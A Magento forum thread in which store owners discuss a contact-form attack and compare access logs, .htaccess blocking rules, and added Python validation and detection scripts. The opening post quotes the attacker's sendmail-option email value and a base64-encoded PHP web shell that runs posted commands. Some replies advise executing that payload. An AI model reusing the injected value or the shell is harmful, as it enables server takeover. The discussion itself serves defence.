Our website has been hacked with eval(base64_decode

SOLVED

Today I got an e-mail from my own Magento store with the following message:

 

Naam: Wendy Rosenberg
E-mail: "Wendy\" -oQ/tmp/ -Xskin/test.php "@aol.com
Telefoon: 9549463828

<?php eval(base64_decode('JHNhZmVtMGRlID0gQGluaV9nZXQoJ3NhZmVfbW9kZScpOw0KaWYgKCEkc2FmZW0wZGUpIHskc2VjdXJpdHk9ICJPRkYiO30NCmVsc2UgeyRzZWN1cml0eT0gIk9OIjt9DQplY2hvICcNCjx0aXRsZT5jY2ZyZXNoIHNpbXBsZSBzaGVsbDwvdGl0bGU+DQo8aDM+PGEgaHJlZj0iaHR0cDovL2NjZnJlc2gubWwvIiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOm5vbmU7IiB0YXJnZXQ9Il9ibGFuayI+PGZvbnQgY29sb3I9ImJsdWUiPmNjZnJlc2gubWw8L2ZvbnQ+PC9hPjwvaDM+DQo8cD48Yj5SZWFkeSBTdG9jazwvYj48L2JyPg0KfCBDQyBGcmVzaCB8IE1haWxlciB8IExlYWRzIHwgc0hlbGwgfCBjUGFuZWwgfCBTU0ggfCBSRFAgfDwvcD4NCjxiPlNBRkVfTU9ERSA6ICcuJHNlY3VyaXR5Lic8L2I+PC9icj4NCjxiPlVuYW1lIDogJy5waHBfdW5hbWUoKS4nPC9iPjwvYnI+DQo8Yj51aWQ9ICcuZ2V0bXl1aWQoKS4nICgnLmdldF9jdXJyZW50X3VzZXIoKS4nKSBnaWQ9Jy5nZXRteWdpZCgpLic8L2I+PC9icj4NCjxiPmN3ZCA6ICcuZ2V0Y3dkKCkuJzwvYj48L2JyPg0KJzsNCj8+DQo8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iPD9waHAgZWNobyAkX1NFUlZFUlsnUEhQX1NFTEYnXTs/PiI+DQo8dGFibGU+DQo8dHI+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJnbyIgc2l6ZT0iMzUiPjwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJDb21tYW5kIiBzdHlsZT0id2lkdGg6IDc1cHg7IGhlaWdodDogMjBweDsiPjwvdGQ+PC90cj4NCjwvZm9ybT4NCjxmb3JtIG1ldGhvZD0iUE9TVCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSI8P3BocCBlY2hvICRfU0VSVkVSWydQSFBfU0VMRiddOz8+Ij4NCjx0cj48dGQ+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9Im15RmlsZSI+PC90ZD48dGQ+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ib2siIHZhbHVlPSJVcGxvYWQiIHN0eWxlPSJ3aWR0aDogNzVweDsgaGVpZ2h0OiAyMHB4OyI+PC90ZD48L3RyPg0KPC90YWJsZT4NCjwvZm9ybT4NCjw/cGhwDQppZiAoaXNzZXQoJF9QT1NUWydvayddKSAmJiBpc3NldCgkX0ZJTEVTWydteUZpbGUnXSkpIHsNCiRmaWxlID0gJF9GSUxFU1snbXlGaWxlJ11bJ3RtcF9uYW1lJ107DQokbmFtZSA9ICRfRklMRVNbJ215RmlsZSddWyduYW1lJ107DQppZiAoIW1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZSwgJG5hbWUpKSB7DQplY2hvICc8Yj48Zm9udCBjb2xvcj0icmVkIj5VbmFibGUgdG8gdXBsb2FkIGZpbGU8L2ZvbnQ+PC9iPic7DQp9IGVsc2Ugew0KZWNobyAnU3VjY2VzcyBVcGxvYWRlZCBGaWxlIDxiPjxmb250IGNvbG9yPSJncmVlbiI+Jy4kbmFtZS4nPC9mb250PjwvYj4nOw0KfQ0KfQ0KaWYgKGlzc2V0KCRfUE9TVFsnZ28nXSkpIHsNCmVjaG8gIjxwcmU+IjsNCnN5c3RlbSgkX1BPU1RbJ2dvJ10pOw0KZWNobyAiPC9wcmU+IjsNCmV4aXQ7DQp9'));?>

 

When I executed this PHP code, I got this web page:

[Image: result of the PHP eval/base64_decode]

What can I do to remove this hack?

My Magento version is 1.9.3.1.

1 ACCEPTED SOLUTION

Re: Our website has been hacked with eval(base64_decode

We've got the same here.
After some analysis of our log files we recognized that the attacker sent the code through a contact form which I didn't know existed.
It's part of our template "Passion" by Magesolution.com.
It seems like the attacker tried to get some code in there via that form.
As a first step we blocked /contacts/ and /contacts/index/ via .htaccess:

RewriteCond %{REQUEST_URI} ^/contacts/index/?
RewriteRule ^(.*)$ https://yourdomain.com/? [L,R=301]
RewriteCond %{REQUEST_URI} ^/contacts/?
RewriteRule ^(.*)$ https://yourdomain.com/? [L,R=301]

As I looked through my log I didn't find any files that had been placed. The request for test.php resulted in a 404 error for him.
The attacker IP was: 148.251.173.52
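The e-mail field quoted in the original post is not a plain address: its local part is quoted and contains sendmail-style option tokens (-oQ, -X) and the path skin/test.php that the attacker later requested. The accepted answer blocks the form's URL; a complementary control is to reject such values in the form field itself. The following Python validator is an added example written for this thread, not code from Magento or from any poster; the function names and the benign sample addresses are assumptions, and the only real input is the address copied from the original post.

```python
import re

# Constructed sample inputs. INJECTED_ADDRESS is the value quoted in the
# original post; the benign addresses are made up and must keep validating.
INJECTED_ADDRESS = '"Wendy\\" -oQ/tmp/ -Xskin/test.php "@aol.com'
BENIGN_ADDRESSES = ["wendy@example.com", "first.last+tag@sub.example.org"]

# Deliberately conservative grammar: unquoted local part, no whitespace, no
# quotes, no backslashes. It rejects some RFC 5322-valid addresses on purpose,
# because a quoted local part is exactly where the option text was hidden.
_STRICT_EMAIL = re.compile(
    r"^[A-Za-z0-9.!#$%&'*+/=?^_`{|}~-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$"
)

# Characters that let a field value reach the mail transport as extra
# arguments or extra headers: whitespace, quotes, backslashes, CR/LF.
_DANGEROUS = re.compile(r'[\s"\\\r\n]')
# Tokens shaped like sendmail command-line options (-oQ, -X, -f, ...).
_SENDMAIL_OPTION = re.compile(r"(^|\s)-[A-Za-z]")


def naive_contains_at(value: str) -> bool:
    """The kind of check that lets the injected address through: one '@'
    and a dotted domain part. Shown only as the weak baseline."""
    local, sep, domain = value.partition("@")
    return sep == "@" and "@" not in domain and "." in domain and bool(local)


def is_safe_email(value: str) -> bool:
    """True only for a single plain address with no transport metacharacters."""
    if _DANGEROUS.search(value):
        return False
    return _STRICT_EMAIL.fullmatch(value) is not None


def injection_indicators(value: str) -> list[str]:
    """Name the reasons a submitted address should be rejected and logged,
    so the form handler can record what it saw instead of silently dropping it."""
    reasons = []
    if re.search(r"[\r\n]", value):
        reasons.append("CR/LF (mail header injection)")
    if '"' in value or "\\" in value:
        reasons.append("quotes/backslash (quoted local part)")
    if re.search(r"\s", value):
        reasons.append("whitespace (argument splitting)")
    if _SENDMAIL_OPTION.search(value):
        reasons.append("sendmail-style option flag")
    return reasons


if __name__ == "__main__":
    print("naive check passes injected address:", naive_contains_at(INJECTED_ADDRESS))
    print("strict check passes injected address:", is_safe_email(INJECTED_ADDRESS))
    print("indicators:", injection_indicators(INJECTED_ADDRESS))
    for addr in BENIGN_ADDRESSES:
        print(addr, "->", is_safe_email(addr))
```

The strict grammar knowingly turns away a handful of exotic but legitimate addresses; for a store contact form that trade is usually acceptable, and the indicator list gives you something concrete to write to the log when a submission is refused.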



Re: Our website has been hacked with eval(base64_decode

Before this hack I had set the return-path to No, 2 weeks ago.

 

In my access log I find this:

148.251.173.52 - - [22/Jan/2017:12:22:25 +0100] "POST /contacts/index/post HTTP/1.1" 302 758 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36"
148.251.173.52 - - [22/Jan/2017:12:22:27 +0100] "GET /skin/test.php HTTP/1.1" 404 1295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36"

 

But I can't find the test.php in the skin folder.
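The two log lines above show the pattern worth alerting on: a POST to the contact form followed two seconds later, from the same IP, by a GET for a .php file under /skin/, a directory that only holds static assets in Magento 1. The script below is an added example for this thread, not code from Magento or from any poster. It parses combined-format access-log lines and raises an alert for any PHP request under a static directory, then correlates it with a preceding contact-form POST from the same client. The first two sample lines are the ones quoted above (user agent shortened on the second); the third line, the 203.0.113.9 client and the five-minute window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: the two lines quoted in the reply above plus one
# ordinary static-asset request from another client that must not alert.
SAMPLE_LOG = """\
148.251.173.52 - - [22/Jan/2017:12:22:25 +0100] "POST /contacts/index/post HTTP/1.1" 302 758 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36"
148.251.173.52 - - [22/Jan/2017:12:22:27 +0100] "GET /skin/test.php HTTP/1.1" 404 1295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) ..."
203.0.113.9 - - [22/Jan/2017:12:30:01 +0100] "GET /skin/frontend/base/default/css/styles.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (constructed) ..."
"""

# Combined log format: ip ident user [timestamp] "METHOD path proto" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# Magento 1 directories that hold static files and should never execute PHP.
STATIC_DIRS = ("/skin/", "/media/", "/js/")
FORM_POST = "/contacts/index/post"          # the contact form handler seen in the log
WINDOW = timedelta(minutes=5)               # assumption: correlation window


def parse_log(text: str) -> list[dict]:
    """Turn raw access-log text into dicts; lines that do not parse are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ip": m["ip"],
            "ts": datetime.strptime(m["ts"], TS_FORMAT),
            "method": m["method"],
            "path": m["path"],
            "status": int(m["status"]),
        })
    return events


def find_suspicious(events: list[dict]) -> list[str]:
    """Return alert strings. Rule 1: any .php requested under a static directory,
    whatever the status code (a 404 still shows intent). Rule 2: that request
    came from an IP that posted to the contact form within WINDOW beforehand."""
    alerts = []
    last_form_post = {}  # ip -> timestamp of its most recent contact-form POST
    for e in sorted(events, key=lambda ev: ev["ts"]):
        if e["method"] == "POST" and e["path"] == FORM_POST:
            last_form_post[e["ip"]] = e["ts"]
            continue
        path = e["path"].split("?", 1)[0]
        if path.startswith(STATIC_DIRS) and path.lower().endswith(".php"):
            alerts.append(
                f"{e['ip']} requested PHP under static dir: {e['path']} (HTTP {e['status']})"
            )
            posted = last_form_post.get(e["ip"])
            if posted is not None and e["ts"] - posted <= WINDOW:
                gap = int((e["ts"] - posted).total_seconds())
                alerts.append(
                    f"{e['ip']} posted to {FORM_POST} {gap}s earlier: "
                    "likely mail-form injection attempt"
                )
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious(parse_log(SAMPLE_LOG)):
        print(alert)
```

Run it over a real access log by reading the file into `parse_log`; the 404 in the quoted log means the write did not land where the attacker expected, but the same rule would have fired on a 200, which is the case you actually need to catch.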

Re: Our website has been hacked with eval(base64_decode

Hello, I have had the same problem since today; I had also set "the return path" to NO. Have you got any news about this?

Re: Our website has been hacked with eval(base64_decode

Not yet,

But have you received an e-mail with the same content?

Re: Our website has been hacked with eval(base64_decode

Yes, exactly the same, two times, and I turned "Return-path" off to "no" last week.

Re: Our website has been hacked with eval(base64_decode

I am still looking into what kind of hack this is.

What I have done is create a .php file with only the content of that PHP script:

<?php eval(base64_decode(.....));?>

Open that file in a web browser and you will see a web page with a link to ccfresh.ml.

 

You can also paste this content into the form on this website: http://ddecode.com/phpdecoder/

It has to do with credit card info, as you will see.

 

Can you inform me when you have solved this hack?

 

Re: Our website has been hacked with eval(base64_decode

I hope it's not a hack but an attempt to hack. I am unfortunately not educated enough to solve this problem.

 

Re: Our website has been hacked with eval(base64_decode

If I find something about it, I will share the information.

Re: Our website has been hacked with eval(base64_decode

Grueff2, thanks for solving this problem, and for the rewrite rules.

I didn't know of the existence of that mail form either.

My attacker has the same IP address, and comes from Germany:

https://www.maxmind.com/en/geoip-demo